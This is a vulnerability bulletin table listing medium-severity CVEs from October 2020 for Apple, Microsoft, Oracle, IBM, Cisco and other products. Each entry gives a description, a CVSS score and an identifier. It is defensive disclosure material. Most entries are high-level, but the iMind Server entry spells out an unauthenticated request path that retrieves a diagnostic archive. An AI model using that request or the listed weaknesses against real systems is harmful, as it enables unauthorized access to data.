apple — ipad_os	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	6.8	CVE-2020-9888 MISC MISC MISC MISC
apple — ipad_os	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	6.8	CVE-2020-9884 MISC
apple — ipad_os	A logic issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. An attacker with memory write capability may be able to bypass pointer authentication codes and run arbitrary code.	2020-10-16	6.5	CVE-2020-9870 MISC MISC MISC
apple — ipad_os	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	6.8	CVE-2020-9890 MISC MISC MISC MISC
apple — safari	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to code execution.	2020-10-16	6.8	CVE-2020-9983 MISC
apple — safari	A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. An issue in Safari Reader mode may allow a remote attacker to bypass the Same Origin Policy.	2020-10-16	5	CVE-2020-9911 MISC MISC
apple — safari	A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. A malicious attacker may cause Safari to suggest a password for the wrong domain.	2020-10-16	5	CVE-2020-9903 MISC MISC
apple — safari	A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution.	2020-10-16	6.8	CVE-2020-9948 MISC
apple — safari	A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution.	2020-10-16	6.8	CVE-2020-9951 MISC
appneta — tcpreplay	An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in get_l2len() that can make tcpprep crash and cause a denial of service.	2020-10-19	5	CVE-2020-24266 MISC
appneta — tcpreplay	An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in MemcmpInterceptorCommon() that can make tcpprep crash and cause a denial of service.	2020-10-19	5	CVE-2020-24265 MISC
boltbrowser — bolt_browser	User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of Danyil Vasilenko’s Bolt Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the Bolt Browser version 1.4 and prior versions.	2020-10-20	4.3	CVE-2020-7370 MISC MISC
cisco — firepower_threat_defense	A vulnerability in the ingress packet processing path of Cisco Firepower Threat Defense (FTD) Software for interfaces that are configured either as Inline Pair or in Passive mode could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient validation when Ethernet frames are processed. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device. A successful exploit could allow the attacker do either of the following: Fill the /ngfw partition on the device: A full /ngfw partition could result in administrators being unable to log in to the device (including logging in through the console port) or the device being unable to boot up correctly. Note: Manual intervention is required to recover from this situation. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition. Cause a process crash: The process crash would cause the device to reload. No manual intervention is necessary to recover the device after the reload.	2020-10-21	6.1	CVE-2020-3577 CISCO
cisco — firepower_threat_defense	A vulnerability in the TCP Intercept functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured Access Control Policies (including Geolocation) and Service Polices on an affected system. The vulnerability exists because TCP Intercept is invoked when the embryonic connection limit is reached, which can cause the underlying detection engine to process the packet incorrectly. An attacker could exploit this vulnerability by sending a crafted stream of traffic that matches a policy on which TCP Intercept is configured. A successful exploit could allow the attacker to match on an incorrect policy, which could allow the traffic to be forwarded when it should be dropped. In addition, the traffic could incorrectly be dropped.	2020-10-21	4.3	CVE-2020-3565 CISCO
cisco — firepower_threat_defense	A vulnerability in the ssl_inspection component of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to crash Snort instances. The vulnerability is due to insufficient input validation in the ssl_inspection component. An attacker could exploit this vulnerability by sending a malformed TLS packet through a Cisco Adaptive Security Appliance (ASA). A successful exploit could allow the attacker to crash a Snort instance, resulting in a denial of service (DoS) condition.	2020-10-21	5	CVE-2020-3317 CISCO
clamxav — clamxav	An issue was discovered in ClamXAV 3 before 3.1.1. A malicious actor could use a properly signed copy of ClamXAV 2 (running with an injected malicious dylib) to communicate with ClamXAV 3’s helper tool and perform privileged operations. This occurs because of inadequate client verification in the helper tool.	2020-10-16	4.6	CVE-2020-26893 MISC
cminds — cm_download_manager	The cm-download-manager plugin before 2.8.0 for WordPress allows XSS.	2020-10-21	4.3	CVE-2020-27344 MISC MISC
dell — emc_networker	Dell EMC NetWorker versions prior to 19.3.0.2 contain an incorrect privilege assignment vulnerability. A non-LDAP remote user with low privileges may exploit this vulnerability to perform ‘saveset’ related operations in an unintended manner. The vulnerability is not exploitable by users authenticated via LDAP.	2020-10-16	4	CVE-2020-26182 CONFIRM
dell — emc_networker	Dell EMC NetWorker versions prior to 19.3.0.2 contain an improper authorization vulnerability. Certain remote users with low privileges may exploit this vulnerability to perform ‘nsrmmdbd’ operations in an unintended manner.	2020-10-16	4	CVE-2020-26183 CONFIRM
gitea — gitea	DISPUTED The git hook feature in Gitea 1.1.0 through 1.12.5 allows for authenticated remote code execution. NOTE: The vendor has indicated this is not a vulnerability and states “This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.”	2020-10-16	6.5	CVE-2020-14144 MISC MISC MISC MISC MISC
gogs — gogs	The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution.	2020-10-16	6.5	CVE-2020-15867 MISC
gopro — gpmf-parser	GoPro gpmf-parser through 1.5 has a stack out-of-bounds write vulnerability in GPMF_ExpandComplexTYPE(). Parsing malicious input can result in a crash or potentially arbitrary code execution.	2020-10-19	6.8	CVE-2020-16158 MISC MISC
huawei — mate_20_firmware	HUAWEI Mate 20 versions earlier than 10.0.0.188(C00E74R3P8) have a buffer overflow vulnerability in the Bluetooth module. Due to insufficient input validation, an unauthenticated attacker may craft Bluetooth messages after successful paring, causing buffer overflow. Successful exploit may cause code execution.	2020-10-19	5.4	CVE-2020-9113 MISC
huawei — mate_30_firmware	HUAWEI Mate 30 versions earlier than 10.1.0.150(C00E136R5P3) and HUAWEI P30 version earlier than 10.1.0.160(C00E160R2P11) have a use after free vulnerability. There is a condition exists that the system would reference memory after it has been freed, the attacker should trick the user into running a crafted application with common privilege, successful exploit could cause code execution.	2020-10-19	6.8	CVE-2020-9263 MISC
ibm — elastic_storage_server	IBM Spectrum Scale V4.2.0.0 through V4.2.3.23 and V5.0.0.0 through V5.0.5.2 as well as IBM Elastic Storage System 6.0.0 through 6.0.1.0 could allow a local attacker to invoke a subset of ioctls on the device with invalid arguments that could crash the keneral and cause a denial of service. IBM X-Force ID: 188599.	2020-10-20	4.9	CVE-2020-4756 XF CONFIRM CONFIRM
ibm — resilient_security_orchestration_automation_and_response	IBM Resilient OnPrem 38.2 could allow a privileged user to inject malicious commands through Python3 scripting. IBM X-Force ID: 185503.	2020-10-16	6.5	CVE-2020-4636 XF CONFIRM
ibm — security_guardium_big_data_intelligence	IBM Security Guardium Big Data Intelligence 1.0 (SonarG) uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 175560.	2020-10-16	5	CVE-2020-4254 XF CONFIRM
ibm — spectrum_scale	IBM Spectrum Scale 5.0.0 through 5.0.5.2 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 188518.	2020-10-20	4.3	CVE-2020-4749 XF CONFIRM
ibm — spectrum_scale	IBM Spectrum Scale 5.0.0 through 5.0.5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188517.	2020-10-20	4.3	CVE-2020-4748 XF CONFIRM
ibm — sterling_b2b_integrator	IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.0.2.2 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 171733.	2020-10-20	6.5	CVE-2019-4680 XF CONFIRM
infinispan — infinispan	A flaw was found in Infinispan version 10, where it permits local access to controls via both REST and HotRod APIs. This flaw allows a user authenticated to the local machine to perform all operations on the caches, including the creation, update, deletion, and shutdown of the entire server.	2020-10-19	5.6	CVE-2020-10746 MISC
libass_project — libass	In libass 0.14.0, the `ass_outline_construct`’s call to `outline_stroke` causes a signed integer overflow.	2020-10-16	6.8	CVE-2020-26682 MISC MISC
magento — magento	Magento versions 2.4.0 and 2.3.5p1 (and earlier) are affected by a persistent XSS vulnerability that allows users to upload malicious JavaScript via the file upload component. This vulnerability could be abused by an unauthenticated attacker to execute XSS attacks against other Magento users. This vulnerability requires a victim to browse to the uploaded file.	2020-10-16	4.3	CVE-2020-24408 MISC
microsoft — .net_framework	An information disclosure vulnerability exists when the .NET Framework improperly handles objects in memory, aka ‘.NET Framework Information Disclosure Vulnerability’.	2020-10-16	4.3	CVE-2020-16937 MISC
microsoft — 365_apps	A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16931.	2020-10-16	6.8	CVE-2020-16932 MISC MISC
microsoft — 365_apps	A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16931, CVE-2020-16932.	2020-10-16	6.8	CVE-2020-16930 MISC MISC MISC
microsoft — 365_apps	A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16930, CVE-2020-16931, CVE-2020-16932.	2020-10-16	6.8	CVE-2020-16929 MISC MISC
microsoft — 365_apps	An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16934.	2020-10-16	6.8	CVE-2020-16955 MISC
microsoft — 365_apps	An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16928, CVE-2020-16955.	2020-10-16	6.8	CVE-2020-16934 MISC
microsoft — 365_apps	An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files, aka ‘Microsoft Office Click-to-Run Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16934, CVE-2020-16955.	2020-10-16	6.8	CVE-2020-16928 MISC
microsoft — 365_apps	A remote code execution vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka ‘Microsoft Office Remote Code Execution Vulnerability’.	2020-10-16	6.8	CVE-2020-16954 MISC
microsoft — 365_apps	A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka ‘Microsoft Excel Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16929, CVE-2020-16930, CVE-2020-16932.	2020-10-16	6.8	CVE-2020-16931 MISC MISC
microsoft — exchange_server	An information disclosure vulnerability exists in how Microsoft Exchange validates tokens when handling certain messages, aka ‘Microsoft Exchange Information Disclosure Vulnerability’.	2020-10-16	4.3	CVE-2020-16969 MISC
microsoft — sharepoint_enterprise_server	An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16950.	2020-10-16	4	CVE-2020-16953 MISC
microsoft — sharepoint_enterprise_server	A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16951.	2020-10-16	6.8	CVE-2020-16952 MISC MISC
microsoft — sharepoint_enterprise_server	An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16950, CVE-2020-16953.	2020-10-16	4	CVE-2020-16948 MISC
microsoft — sharepoint_enterprise_server	A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka ‘Microsoft SharePoint Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16952.	2020-10-16	6.8	CVE-2020-16951 MISC
microsoft — sharepoint_server	An information disclosure vulnerability exists when Microsoft SharePoint Server fails to properly handle objects in memory, aka ‘Microsoft SharePoint Information Disclosure Vulnerability’. This CVE ID is unique from CVE-2020-16941, CVE-2020-16942, CVE-2020-16948, CVE-2020-16953.	2020-10-16	4.3	CVE-2020-16950 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.	2020-10-16	4.6	CVE-2020-16973 MISC
microsoft — windows_10	A remote code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory, aka ‘Microsoft Windows Codecs Library Remote Code Execution Vulnerability’.	2020-10-16	6.8	CVE-2020-17022 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka ‘Group Policy Elevation of Privilege Vulnerability’.	2020-10-16	4.6	CVE-2020-16939 MISC MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.	2020-10-16	4.6	CVE-2020-16972 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.	2020-10-16	4.6	CVE-2020-16912 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16975, CVE-2020-16976.	2020-10-16	4.6	CVE-2020-16974 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16976.	2020-10-16	4.6	CVE-2020-16975 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16909.	2020-10-16	4.6	CVE-2020-16905 MISC
microsoft — windows_10	A security feature bypass vulnerability exists when Microsoft Windows fails to handle file creation permissions, which could allow an attacker to create files in a protected Unified Extensible Firmware Interface (UEFI) location.To exploit this vulnerability, an attacker could run a specially crafted application to bypass Unified Extensible Firmware Interface (UEFI) variable security in Windows.The security update addresses the vulnerability by correcting security feature behavior to enforce permissions., aka ‘Windows Security Feature Bypass Vulnerability’.	2020-10-16	4.3	CVE-2020-16910 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16936, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975.	2020-10-16	4.6	CVE-2020-16976 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16876.	2020-10-16	4.6	CVE-2020-16920 MISC
microsoft — windows_10	A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Remote Code Execution Vulnerability’.	2020-10-16	5.8	CVE-2020-16898 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka ‘Windows Error Reporting Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16905.	2020-10-16	4.6	CVE-2020-16909 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16920.	2020-10-16	4.6	CVE-2020-16876 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Backup Service Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16912, CVE-2020-16972, CVE-2020-16973, CVE-2020-16974, CVE-2020-16975, CVE-2020-16976.	2020-10-16	4.6	CVE-2020-16936 MISC
microsoft — windows_10	A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests., aka ‘Windows Hyper-V Denial of Service Vulnerability’.	2020-10-16	4.6	CVE-2020-1243 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows Storage Services improperly handle file operations, aka ‘Windows Storage Services Elevation of Privilege Vulnerability’.	2020-10-16	4.6	CVE-2020-0764 MISC
microsoft — windows_10	A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-1167.	2020-10-16	6.8	CVE-2020-16923 MISC
microsoft — windows_10	A remote code execution vulnerability exists when Windows Network Address Translation (NAT) fails to properly handle UDP traffic, aka ‘Windows NAT Remote Code Execution Vulnerability’.	2020-10-16	6.8	CVE-2020-16894 MISC
microsoft — windows_10	An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles junction points, aka ‘Windows – User Profile Service Elevation of Privilege Vulnerability’.	2020-10-16	4.9	CVE-2020-16940 MISC MISC
microsoft — windows_10	An information disclosure vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability’.	2020-10-16	5	CVE-2020-16896 MISC
microsoft — windows_10	A denial of service vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Denial of Service Vulnerability’.	2020-10-16	5	CVE-2020-16949 MISC
microsoft — windows_10	A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory, aka ‘Media Foundation Memory Corruption Vulnerability’.	2020-10-16	6.8	CVE-2020-16915 MISC MISC
microsoft — windows_10	A security feature bypass vulnerability exists in Microsoft Word software when it fails to properly handle .LNK files, aka ‘Microsoft Word Security Feature Bypass Vulnerability’.	2020-10-16	6.8	CVE-2020-16933 MISC
microsoft — windows_server_2012	An elevation of privilege vulnerability exists when the Windows iSCSI Target Service improperly handles file operations, aka ‘Windows iSCSI Target Service Elevation of Privilege Vulnerability’.	2020-10-16	4.6	CVE-2020-16980 MISC
mind — imind_server	InterMind iMind Server through 3.13.65 allows remote unauthenticated attackers to read the self-diagnostic archive via a direct api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1 request.	2020-10-20	5	CVE-2020-24765 MISC
mozilla — network_security_services	A flaw was found in the way NSS handled CCS (ChangeCipherSpec) messages in TLS 1.3. This flaw allows a remote attacker to send multiple CCS messages, causing a denial of service for servers compiled with the NSS library. The highest threat from this vulnerability is to system availability. This flaw affects NSS versions before 3.58.	2020-10-20	5	CVE-2020-25648 MISC MISC
nagios — nagios_xi	Improper neutralization of argument delimiters in a command in Nagios XI 5.7.3 allows a remote, authenticated admin user to write to arbitrary files and ultimately execute code with the privileges of the apache user.	2020-10-20	6.5	CVE-2020-5792 MISC
nagios — nagios_xi	Cross-site request forgery in Nagios XI 5.7.3 allows a remote attacker to perform sensitive application actions by tricking legitimate users into clicking a crafted link.	2020-10-20	4.3	CVE-2020-5790 MISC
olimpoks — olimpok	OLIMPOKS under 3.3.39 allows Auth/Admin ErrorMessage XSS. Remote Attacker can use discovered vulnerability to inject malicious JavaScript payload to victim’s browsers in context of vulnerable applications. Executed code can be used to steal administrator’s cookies, influence HTML content of targeted application and perform phishing-related attacks. Vulnerable application used in more than 3000 organizations in different sectors from retail to industries.	2020-10-16	4.3	CVE-2020-16270 MISC MISC MISC
oracle — application_express	Vulnerability in the Oracle Application Express Data Reporter component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Data Reporter. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Data Reporter, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Data Reporter accessible data as well as unauthorized read access to a subset of Oracle Application Express Data Reporter accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	4.9	CVE-2020-14899 MISC
oracle — application_express	Vulnerability in the Oracle Application Express Group Calendar component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Group Calendar. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Group Calendar, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Group Calendar accessible data as well as unauthorized read access to a subset of Oracle Application Express Group Calendar accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	4.9	CVE-2020-14900 MISC
oracle — application_express	Vulnerability in the Oracle Application Express component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having SQL Workshop privilege with network access via HTTP to compromise Oracle Application Express. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express accessible data as well as unauthorized read access to a subset of Oracle Application Express accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	4.9	CVE-2020-14762 MISC
oracle — application_express	Vulnerability in the Oracle Application Express Packaged Apps component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Packaged Apps. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Packaged Apps, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Packaged Apps accessible data as well as unauthorized read access to a subset of Oracle Application Express Packaged Apps accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	4.9	CVE-2020-14898 MISC
oracle — application_express	Vulnerability in the Oracle Application Express Quick Poll component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account privilege with network access via HTTP to compromise Oracle Application Express Quick Poll. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Express Quick Poll, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Express Quick Poll accessible data as well as unauthorized read access to a subset of Oracle Application Express Quick Poll accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).	2020-10-21	4.9	CVE-2020-14763 MISC
oracle — applications_framework	Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Popup windows). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).	2020-10-21	5.8	CVE-2020-14746 MISC
oracle — applications_manager	Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: AMP EBS Integration). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	5	CVE-2020-14811 MISC
oracle — applications_manager	Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: SQL Extensions). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).	2020-10-21	5	CVE-2020-14826 MISC
oracle — applications_manager	Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: Oracle Diagnostics Interfaces). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.7. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Manager accessible data as well as unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N).	2020-10-21	6.4	CVE-2020-14761 MISC
oracle — banking_corporate_lending	Vulnerability in the Oracle Banking Corporate Lending product of Oracle Financial Services Applications (component: Core). Supported versions that are affected are 12.3.0 and 14.0.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Corporate Lending. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Corporate Lending accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).	2020-10-21	6.8	CVE-2020-14894 MISC
oracle — banking_payments	Vulnerability in the Oracle Banking Payments product of Oracle Financial Services Applications (component: Core). Supported versions that are affected are 14.1.0-14.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Banking Payments. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Banking Payments accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).	2020-10-21	6.8	CVE-2020-14896 MISC
